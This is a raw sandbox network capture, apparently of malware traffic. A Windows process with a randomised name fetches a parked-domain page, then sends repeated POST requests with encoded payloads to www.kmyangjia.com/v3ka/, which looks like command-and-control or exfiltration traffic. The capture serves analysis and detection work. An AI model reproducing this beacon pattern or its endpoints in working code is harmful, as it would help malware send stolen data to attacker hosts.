Feb 28, 2024 15:46:59.636909008 CET	1286	IN	HTTP/1.1 200 OK date: Wed, 28 Feb 2024 14:46:59 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding x-powered-by: PHP/8.1.17 expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_hsVn+gpY4hA4Ms5uMzWK0YtFryG6v4tWym48Mj91IfyTJYYLJNUf+Ap+1jKcw8NRtycOlMtr+66nYom0bgRt2Q== last-modified: Wed, 28 Feb 2024 14:46:59 GMT x-cache-miss-from: parking-5747c769c4-xbdhl server: NginX connection: close Data Raw: 32 43 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 68 73 56 6e 2b 67 70 59 34 68 41 34 4d 73 35 75 4d 7a 57 4b 30 59 74 46 72 79 47 36 76 34 74 57 79 6d 34 38 4d 6a 39 31 49 66 79 54 4a 59 59 4c 4a 4e 55 66 2b 41 70 2b 31 6a 4b 63 77 38 4e 52 74 79 63 4f 6c 4d 74 72 2b 36 36 6e 59 6f 6d 30 62 67 52 74 32 51 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 6d 76 6d 75 73 69 63 66 61 63 74 6f 72 79 2e 6f 72 67 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 6d 76 6d 75 73 69 63 66 61 63 74 6f 72 79 20 52 65 73 6f 75 72 63 65 73 20 61 6e 64 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 6d 76 6d 75 73 69 63 66 61 63 74 6f 72 79 2e 6f 72 67 20 69 73 20 79 6f 75 72 20 66 69 72 73 74 20 61 6e 64 20 62 65 73 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_hsVn+gpY4hA4Ms5uMzWK0YtFryG6v4tWym48Mj91IfyTJYYLJNUf+Ap+1jKcw8NRtycOlMtr+66nYom0bgRt2Q==><head><meta charset="utf-8"><title>mvmusicfactory.org - mvmusicfactory Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="mvmusicfactory.org is your first and best source for all of the information youre looking f
Feb 28, 2024 15:46:59.637016058 CET	1286	IN	Data Raw: 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 6d 76 6d 75 73 69 63 66 61 63 74 Data Ascii: or. From general topics to more of what you would expect to find here, mvmusicfactory.org has it all. We h576ope you find what you are searching for!"><link rel="icon" type="image/png" href="//img.sedoparking.com/te
Feb 28, 2024 15:46:59.637080908 CET	1286	IN	Data Raw: 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 Data Ascii: {overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[ty576pe=submit]{
Feb 28, 2024 15:46:59.637135983 CET	1286	IN	Data Raw: 6e 65 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 30 65 31 36 32 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 Data Ascii: ne}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox
Feb 28, 2024 15:46:59.637221098 CET	1286	IN	Data Raw: 63 6b 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 Data Ascii: ck}.container-imprint__content-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contac
Feb 28, 2024 15:46:59.637279034 CET	1286	IN	Data Raw: 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6f 6b 69 65 2d Data Ascii: tion:all .3s;-moz-transition:all .3s;transition:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;display
Feb 28, 2024 15:46:59.637355089 CET	1286	IN	Data Raw: 6c 6f 72 3a 23 37 32 37 63 38 33 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6d 65 64 69 75 6d 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 73 6d 7b 62 61 Data Ascii: lor:#727c83;border-color:#727c83;color:#fff;font-size:medium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-s
Feb 28, 2024 15:46:59.637403965 CET	802	IN	Data Raw: 74 69 76 65 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 37 30 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 63 6f 6e Data Ascii: tive;height:100%;max-width:1700px;margin:0 auto !important}.container-content__container-relatedlinks,.container-content__container-ads,.container-content__webarchive{width:30%;display:inline-block}.container-content__container-relatedlinks{ma
Feb 28, 2024 15:46:59.637456894 CET	1286	IN	Data Raw: 31 30 36 32 0d 0a 72 76 65 64 2e 70 6e 67 22 29 20 23 30 65 31 36 32 65 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 6c 65 66 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 39 34 25 20 36 34 30 70 78 3b 66 6c 65 78 2d 67 72 6f 77 Data Ascii: 1062rved.png") #0e162e no-repeat center left;background-size:94% 640px;flex-grow:2;-moz-transform:scaleX(-1);-o-transform:scaleX(-1);-webkit-transform:scaleX(-1);transform:scaleX(-1);z-index:-1;top:50px;position:inherit}.container-content--l
Feb 28, 2024 15:46:59.637550116 CET	1286	IN	Data Raw: 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 23 39 66 64 38 30 Data Ascii: r-ads-list__list-element-link{font-size:1em;text-decoration:underline;color:#9fd801}.two-tier-ads-list__list-element-link:link,.two-tier-ads-list__list-element-link:visited{text-decoration:underline}.two-tier-ads-list__list-element-link:hover,
Feb 28, 2024 15:46:59.941966057 CET	1286	IN	Data Raw: 65 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 63 6f 6c 6f 72 3a 23 38 38 38 7d 0a 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 Data Ascii: el,sans-serif;font-size:16px;color:#888} </style><script type="text/javascript"> var dto = {"uiOptimize":false,"singleDomainName":"mvmusicfactory.org","domainName":"mvmusicfactory.org","domainPrice":0,"domainCurrency":"","adultFla

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.11.20	50260	103.146.179.172	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:47:06.561790943 CET	727	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.kmyangjia.com Origin: http://www.kmyangjia.com Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: max-age=0 Referer: http://www.kmyangjia.com/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 65 53 72 42 65 46 63 63 6f 5a 77 77 44 70 66 36 59 39 31 6a 77 4d 56 36 32 73 4c 4d 36 57 6d 77 49 61 2f 50 47 39 66 48 53 7a 58 61 5a 67 58 4b 39 6a 58 63 35 46 37 36 76 4e 67 54 63 50 36 4a 50 69 37 68 72 4b 48 52 50 32 4d 31 46 61 70 61 79 35 7a 72 75 35 50 57 59 77 30 5a 37 62 4a 48 71 4c 37 54 36 58 39 75 4f 56 45 66 64 35 42 70 33 32 56 79 48 76 48 6a 6d 43 4e 4e 57 77 49 77 6c 45 64 67 31 42 48 39 4f 33 35 6e 31 64 32 70 46 41 68 49 5a 61 74 64 47 57 42 52 6c 59 31 4d 34 77 38 44 56 35 72 52 57 6c 4b 57 50 65 49 58 46 6e 78 4a 58 67 6b 48 33 37 4f 71 68 39 39 2f 64 41 3d 3d Data Ascii: nf8dPP8p=eSrBeFccoZwwDpf6Y91jwMV62sLM6WmwIa/PG9fHSzXaZgXK9jXc5F76vNgTcP6JPi7hrKHRP2M1Fapay5zru5PWYw0Z7bJHqL7T6X9uOVEfd5Bp32VyHvHjmCNNWwIwlEdg1BH9O35n1d2pFAhIZatdGWBRlY1M4w8DV5rRWlKWPeIXFnxJXgkH37Oqh99/dA==
Feb 28, 2024 15:47:06.876094103 CET	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 28 Feb 2024 14:47:06 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.11.20	50261	103.146.179.172	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:47:09.411895037 CET	1067	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.kmyangjia.com Origin: http://www.kmyangjia.com Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 545 Cache-Control: max-age=0 Referer: http://www.kmyangjia.com/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 65 53 72 42 65 46 63 63 6f 5a 77 77 44 4a 76 36 65 61 68 6a 32 73 56 39 6f 38 4c 4d 30 32 6d 38 49 61 7a 50 47 38 72 74 52 42 44 61 5a 46 7a 4b 36 6e 37 63 38 46 37 36 6f 39 67 57 52 76 36 43 50 69 33 70 72 4b 4c 52 50 32 49 31 45 6f 4e 61 77 4a 7a 6f 37 4a 50 4a 64 77 30 63 2f 62 4a 4e 71 4c 33 31 36 58 5a 75 50 6c 59 66 62 4c 35 70 68 30 39 78 4b 76 48 36 69 79 4e 43 63 51 49 32 6c 45 52 6f 31 42 50 74 4f 43 78 6e 32 39 57 70 45 41 68 4a 54 71 74 67 5a 47 41 65 73 39 59 75 30 41 42 75 65 4b 79 4c 50 41 57 56 53 35 73 72 50 32 64 5a 47 52 59 5a 78 70 44 6f 6e 64 56 31 4a 75 48 4e 56 62 54 42 73 49 4f 48 52 42 45 46 71 4a 67 78 52 73 6d 37 32 50 76 55 6c 6e 72 54 4c 75 2b 6c 61 4f 4f 56 2f 75 6d 4e 39 5a 62 34 71 2f 6e 6c 54 6a 61 6c 41 6a 41 62 53 65 2f 34 30 70 62 47 4f 35 6d 35 4e 58 42 65 32 2f 56 47 46 52 72 74 6b 61 78 79 35 2f 67 41 49 6e 47 2f 6d 6e 43 45 53 30 36 54 69 32 6d 2f 6c 57 73 37 65 32 79 73 63 6a 2f 78 73 4c 58 43 6b 32 4f 4e 64 35 4a 43 6e 48 4e 2b 59 4c 6b 6f 39 30 4f 34 71 73 50 75 58 4f 59 53 74 59 73 64 53 75 53 54 48 50 68 46 32 6f 54 35 38 31 56 7a 37 31 52 49 67 52 38 4d 6f 43 57 38 38 4d 7a 6a 5a 62 6e 72 35 57 61 51 5a 6b 75 4f 78 32 48 38 79 77 30 6a 65 62 72 6f 44 6d 6c 58 42 49 34 65 47 64 46 44 54 53 44 78 36 4b 6a 48 72 55 7a 45 6b 41 56 43 43 74 70 36 63 35 44 57 42 6d 53 44 61 48 50 6a 6e 78 56 68 43 2b 50 52 4b 62 4f 44 44 66 4e 64 39 42 45 62 4b 71 34 48 76 49 2f 62 61 36 36 69 6a 39 33 58 68 74 51 39 61 49 31 6e 66 2b 38 34 66 75 6a 4d 75 70 35 52 6b 71 51 49 78 46 50 63 7a 2b 2b 63 42 53 6f 30 58 7a 77 4a 41 7a 31 55 43 44 66 67 36 75 6f 3d Data Ascii: nf8dPP8p=eSrBeFccoZwwDJv6eahj2sV9o8LM02m8IazPG8rtRBDaZFzK6n7c8F76o9gWRv6CPi3prKLRP2I1EoNawJzo7JPJdw0c/bJNqL316XZuPlYfbL5ph09xKvH6iyNCcQI2lERo1BPtOCxn29WpEAhJTqtgZGAes9Yu0ABueKyLPAWVS5srP2dZGRYZxpDondV1JuHNVbTBsIOHRBEFqJgxRsm72PvUlnrTLu+laOOV/umN9Zb4q/nlTjalAjAbSe/40pbGO5m5NXBe2/VGFRrtkaxy5/gAInG/mnCES06Ti2m/lWs7e2yscj/xsLXCk2ONd5JCnHN+YLko90O4qsPuXOYStYsdSuSTHPhF2oT581Vz71RIgR8MoCW88MzjZbnr5WaQZkuOx2H8yw0jebroDmlXBI4eGdFDTSDx6KjHrUzEkAVCCtp6c5DWBmSDaHPjnxVhC+PRKbODDfNd9BEbKq4HvI/ba66ij93XhtQ9aI1nf+84fujMup5RkqQIxFPcz++cBSo0XzwJAz1UCDfg6uo=
Feb 28, 2024 15:47:09.720797062 CET	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 28 Feb 2024 14:47:09 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.11.20	50262	103.146.179.172	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:47:12.254273891 CET	7716	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.kmyangjia.com Origin: http://www.kmyangjia.com Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 52933 Cache-Control: max-age=0 Referer: http://www.kmyangjia.com/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 65 53 72 42 65 46 63 63 6f 5a 77 77 44 4a 76 36 65 61 68 6a 32 73 56 39 6f 38 4c 4d 30 32 6d 38 49 61 7a 50 47 38 72 74 52 41 37 61 5a 54 2f 4b 38 47 37 63 2f 46 37 36 72 39 67 58 52 76 36 66 50 69 76 74 72 4b 58 6e 50 30 67 31 48 37 31 61 77 38 6e 6f 78 70 50 55 45 77 30 61 37 62 49 55 71 4c 37 62 36 57 39 59 4f 55 73 66 64 34 78 70 33 56 39 79 53 76 48 6a 69 79 4e 30 59 51 4a 4a 6c 48 38 31 31 42 7a 74 4f 45 35 6e 30 4c 53 70 47 54 5a 4a 61 61 74 6a 53 6d 41 42 6d 64 59 79 30 41 55 4b 65 4b 7a 2b 50 46 6d 56 53 2b 34 72 64 6c 31 61 46 78 59 5a 38 4a 44 76 6a 64 6f 64 4a 76 75 4c 56 59 50 42 73 50 36 48 51 68 45 46 76 6f 67 79 56 4d 6d 35 38 76 75 4d 68 6e 6e 4d 4c 75 72 55 61 50 71 56 2b 65 61 4e 7a 4f 6e 34 70 65 6e 6c 50 54 61 72 4f 44 42 47 64 2b 2b 38 30 71 69 74 4f 35 48 4d 4e 56 4e 65 31 64 64 47 42 31 2f 71 32 36 77 37 36 2f 67 5a 62 33 43 7a 6d 6e 54 64 53 30 36 44 69 33 53 2f 6d 6d 38 37 66 79 75 72 52 54 2f 38 30 37 58 54 7a 6d 4b 39 64 34 68 77 6e 43 4e 75 59 4d 38 6f 38 55 4f 34 6f 50 6e 74 46 65 59 52 6b 34 73 44 57 75 54 56 48 50 39 5a 32 71 2f 50 38 42 6c 7a 36 46 68 49 6e 42 38 4e 71 69 57 67 6e 63 7a 2b 50 72 6e 72 35 57 58 30 5a 6b 71 4f 78 43 76 38 77 43 63 6a 49 34 44 6f 42 6d 6c 52 42 49 34 50 47 64 49 2f 54 53 4c 54 36 4c 53 63 72 53 54 45 6e 54 64 43 4f 50 42 35 58 5a 43 63 58 57 53 55 46 58 44 4e 6e 78 4a 70 43 36 6a 37 4c 70 4b 44 43 62 70 64 76 78 45 61 4f 4b 34 41 35 59 2f 4e 52 61 32 6d 6a 38 61 69 68 73 6b 74 61 50 4a 6e 64 4c 46 4a 62 73 58 37 74 4c 5a 41 68 34 63 70 6d 6b 4c 54 77 64 36 47 4f 41 34 4c 62 31 4d 37 4d 51 55 64 51 78 54 7a 35 4c 70 49 66 78 4e 4b 41 45 6c 6f 30 47 4d 43 41 75 34 4f 56 51 37 5a 38 6b 52 31 37 59 4a 6c 63 69 69 6f 5a 41 69 56 41 39 75 52 47 4a 70 65 6f 59 73 59 64 5a 66 56 61 5a 37 51 69 4b 71 56 55 4a 47 6a 36 4e 71 61 61 4b 47 34 2b 4f 32 77 7a 72 33 65 71 38 6c 34 46 35 57 66 47 6b 75 43 70 57 52 54 42 43 46 47 70 44 50 47 66 43 6c 6a 37 52 44 7a 30 32 32 6e 4a 75 67 77 33 31 38 72 35 72 63 5a 4c 49 4e 47 2b 47 4a 64 67 44 42 41 34 6c 39 43 74 53 63 71 77 72 68 62 76 47 47 38 77 2f 61 43 70 53 38 35 79 54 4d 31 6a 62 72 6c 2f 79 56 47 5a 42 71 6b 37 43 4e 65 6f 4f 4a 4c 75 4c 30 49 33 79 61 4b 7a 74 31 38 6a 6d 59 61 69 73 55 2b 6a 66 72 2f 51 36 6d 4c 71 41 33 47 44 6f 66 35 78 6e 72 6d 70 79 49 35 34 67 36 63 6b 32 66 43 73 38 51 7a 43 4c 44 56 77 76 71 4b 5a 4e 38 41 50 31 63 34 59 39 65 46 50 70 61 5a 51 76 4d 4c 30 72 34 74 37 6a 35 53 31 46 50 4b 48 39 78 71 2f 6d 32 61 6f 74 68 70 44 77 78 4f 2b 41 4f 30 4d 30 2b 43 33 32 49 4c 76 38 75 4d 44 61 2b 61 41 66 36 36 55 77 61 36 53 6f 6b 72 4b 47 53 49 31 41 48 65 7a 6b 55 75 39 76 65 75 46 43 53 79 31 34 2b 4f 63 58 6b 50 6d 65 63 64 41 38 66 35 38 74 68 7a 53 76 47 38 67 69 34 30 55 38 74 43 52 50 71 44 6e 4d 4f 44 76 6d 50 45 35 57 6f 6f 66 44 58 7a 64 4b 31 51 79 77 6c 70 6c 67 7a 41 62 30 45 79 34 36 4b 39 67 35 4f 43 6a 55 62 74 57 30 46 74 4a 4e 53 52 56 44 6d 4c 49 54 4a 72 69 4b 39 78 4a 32 4e 4f 34 57 33 34 6b 48 50 46 33 4d 65 57 34 4d 63 55 61 39 59 50 73 50 50 53 73 35 61 7a 35 6c 4a 4b 2b 59 66 57 50 4b 37 79 43 31 44 43 46 71 30 6e 47 4f 52 62 32 61 51 50 6d 2f 57 79 6b 73 48 44 69 55 48 52 54 4e 35 44 63 2f 53 53 6b 76 76 51 37 4c 68 4d 61 75 41 55 70 59 76 2b 4b 63 4f 4a 64 30 6e 30 5a 52 67 7a 41 42 33 54 54 50 57 53 6f 52 44 4e 6d 30 30 41 68 50 4f 75 6c 73 63 5a 67 46 4e 4d 6d 64 7a 35 2f 72 35 76 37 41 54 57 71 5a 32 6b 6b 70 76 43 62 51 70 51 31 76 68 43 51 63 64 30 37 6c 49 33 47 79 7a 50 69 2f 31 75 4c 6b 33 70 35 35 6d 51 4c 32 63 58 50 7a 50 39 4f 54 70 5a 45 47 48 44 52 37 67 77 45 47 63 64 6c 45 66 39 6f 56 56 4c 70 79 6b 35 4a 4f 71 46 48 47 70 6f 68 72 6c 4c 36 61 68 37 57 76 62 32 34 4d 30 74 31 67 59 38 37 6a 4b 30 73 63 79 30 69 35 38 6e 58 34 35 6d 65 4b 59 77 66 77 46 65 35 54 49 52 66 77 4d 73 46 49 46 36 2b 57 2f 31 53 72 77 57 74 47 76 74 48 72 68 42 48 41 67 59 61 56 68 71 66 36 31 42 5a 57 4f 68 34 52 79 79 4f 6d 47 54 53 46 79 39 78 55 32 78 50 4e 35 77 78 52 58 6f 55 59 42 39 32 74 56 4b 73 5a 68 44 51 36 78 6a 77 6b 69 6a 35 62 Data Ascii: nf8dPP8p=eSrBeFccoZwwDJv6eahj2sV9o8LM02m8IazPG8rtRA7aZT/K8G7c/F76r9gXRv6fPivtrKXnP0g1H71aw8noxpPUEw0a7bIUqL7b6W9YOUsfd4xp3V9ySvHjiyN0YQJJlH811BztOE5n0LSpGTZJaatjSmABmdYy0AUKeKz+PFmVS+4rdl1aFxYZ8JDvjdodJvuLVYPBsP6HQhEFvogyVMm58vuMhnnMLurUaPqV+eaNzOn4penlPTarODBGd++80qitO5HMNVNe1ddGB1/q26w76/gZb3CzmnTdS06Di3S/mm87fyurRT/807XTzmK9d4hwnCNuYM8o8UO4oPntFeYRk4sDWuTVHP9Z2q/P8Blz6FhInB8NqiWgncz+Prnr5WX0ZkqOxCv8wCcjI4DoBmlRBI4PGdI/TSLT6LScrSTEnTdCOPB5XZCcXWSUFXDNnxJpC6j7LpKDCbpdvxEaOK4A5Y/NRa2mj8aihsktaPJndLFJbsX7tLZAh4cpmkLTwd6GOA4Lb1M7MQUdQxTz5LpIfxNKAElo0GMCAu4OVQ7Z8kR17YJlciioZAiVA9uRGJpeoYsYdZfVaZ7QiKqVUJGj6NqaaKG4+O2wzr3eq8l4F5WfGkuCpWRTBCFGpDPGfClj7RDz022nJugw318r5rcZLING+GJdgDBA4l9CtScqwrhbvGG8w/aCpS85yTM1jbrl/yVGZBqk7CNeoOJLuL0I3yaKzt18jmYaisU+jfr/Q6mLqA3GDof5xnrmpyI54g6ck2fCs8QzCLDVwvqKZN8AP1c4Y9eFPpaZQvML0r4t7j5S1FPKH9xq/m2aothpDwxO+AO0M0+C32ILv8uMDa+aAf66Uwa6SokrKGSI1AHezkUu9veuFCSy14+OcXkPmecdA8f58thzSvG8gi40U8tCRPqDnMODvmPE5WoofDXzdK1QywlplgzAb0Ey46K9g5OCjUbtW0FtJNSRVDmLITJriK9xJ2NO4W34kHPF3MeW4McUa9YPsPPSs5az5lJK+YfWPK7yC1DCFq0nGORb2aQPm/WyksHDiUHRTN5Dc/SSkvvQ7LhMauAUpYv+KcOJd0n0ZRgzAB3TTPWSoRDNm00AhPOulscZgFNMmdz5/r5v7ATWqZ2kkpvCbQpQ1vhCQcd07lI3GyzPi/1uLk3p55mQL2cXPzP9OTpZEGHDR7gwEGcdlEf9oVVLpyk5JOqFHGpohrlL6ah7Wvb24M0t1gY87jK0scy0i58nX45meKYwfwFe5TIRfwMsFIF6+W/1SrwWtGvtHrhBHAgYaVhqf61BZWOh4RyyOmGTSFy9xU2xPN5wxRXoUYB92tVKsZhDQ6xjwkij5bFE9gBt1mW123/ibnRgkTkYjcF0tl6EFvzGBz4cTgbHDDlARdU4UQRT3ftyUXABHx/r2Oq99ldHw37iXgK5lsOfoIzyd/aWBjLwpWHxh5hob4Ui5KbAQ0QhuJ+qnGi3OuCrxuIzkO/bKI8AW+Pfd